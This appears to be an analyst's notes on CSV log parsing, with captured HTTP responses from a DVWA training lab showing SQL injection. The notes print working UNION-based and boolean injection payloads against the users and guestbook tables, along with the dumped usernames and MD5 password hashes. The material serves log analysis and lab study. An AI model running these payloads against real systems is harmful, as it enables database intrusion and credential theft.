##################################################################################################################### # Work Area ##################################################################################################################### CSV Delimiter: ~,~ Log Format appearance: Standard no K/V "value1","value2","value3","value4" Gold Standard no K/V "value1"~,~"value2"~,~"value3"~,~"value4" Example proper URI Query that will break the Standard CSV with Delimiter & "" Text Qualifier: https://waflogic.com/partner_inventory? serv_1=(D)DoS Review","serv_deets_1=Review, Consult, Deploy","part_sel="Dynamo Inc., And Partners" Log #8, 9, 11 & 12 SQLi vulnerability discovered and also disclosed User ID 1 which is Admin (support_id=9216504019076315941 OR support_id=9216504019076315925 OR support_id=9216504019076276916) HTTP/1.1 200 OK\r\nDate: Wed, 07 Jun 2023 02:16:22 GMT\r\nServer: Apache/2.4.57 (Debian)\r\nExpires: Tue, 23 Jun 2009 12:00:00 GMT\r\nCache-Control: no-cache, must-revalidate\r\nPragma: no-cache\r\nVary: Accept-Encoding\r\nContent-Encoding: gzip\r\nContent-Length: 1360\r\nConnection: close\r\nContent-Type: text/html;charset=utf-8\r\n\r\n\n\n\n\n
\n \n\nID:1) AND 8477=6243 AND (6495=6495\r\n
First name: admin
Surname: admin
Damn Vulnerable Web Application (DVWA)
\n \n\nID: 1' UNION ALL SELECT NULL,CONCAT(0x71767a6b71,JSON_ARRAYAGG(CONCAT_WS(0x617a626b6164,`user`,avatar,failed_login,first_name,last_login,last_name,password,user_id)),0x71706b6b71) FROM dvwa.users#
First name: admin
Surname: admin
ID: 1' UNION ALL SELECT NULL,CONCAT(0x71767a6b71,JSON_ARRAYAGG(CONCAT_WS(0x617a626b6164,`user`,avatar,failed_login,first_name,last_login,last_name,password,user_id)),0x71706b6b71) FROM dvwa.users#\r\n
First name:
Surname: qvzkq[""adminazbkad/DVWA/hackable/users/admin.jpgazbkad0azbkadadminazbkad2023-06-05 11:34:14azbkadadminazbkad5f4dcc3b5aa765d61d8327deb882cf99azbkad1"",""gordonbazbkad/DVWA/hackable/users/gordonb.jpgazbkad0azbkadGordonazbkad2023-06-05 11:34:14azbkadBrownazbkade99a18c428cb38d5f260853678922e03azbkad2"",""1337azbkad/DVWA/hackable/users/1337.jpgazbkad0azbkadHackazbkad2023-06-05 11:34:14azbkadMeazbkad8d3533d75ae2c3966d7e0d4fcc69216bazbkad3"",""pabloazbkad/DVWA/hackable/users/pablo.jpgazbkad0azbkadPabloazbkad2023-06-05 11:34:14azbkadPicassoazbkad0d107d09f5bbe40cade3de5c71e9e9b7azbkad4"",""smithyazbkad/DVWA/hackable/users/smithy.jpgazbkad0azbkadBobazbkad2023-06-05 11:34:14azbkadSmithazbkad5f4dcc3b5aa765d61d8327deb882cf99azbkad5""]qpkkq
Damn Vulnerable Web Application (DVWA)
\n \n\nID: 1' UNION ALL SELECT NULL,CONCAT(0x71767a6b71,JSON_ARRAYAGG(CONCAT_WS(0x617a626b6164,comment,comment_id,name)),0x71706b6b71) FROM dvwa.guestbook#
First name: admin
Surname: admin
ID: 1' UNION ALL SELECT NULL,CONCAT(0x71767a6b71,JSON_ARRAYAGG(CONCAT_WS(0x617a626b6164,comment,comment_id,name)),0x71706b6b71) FROM dvwa.guestbook#\r\n
First name:
Surname: qvzkq[""This is a test comment.azbkad1azbkadtest""]qpkkq
Damn Vulnerable Web Application (DVWA)
\n \n\n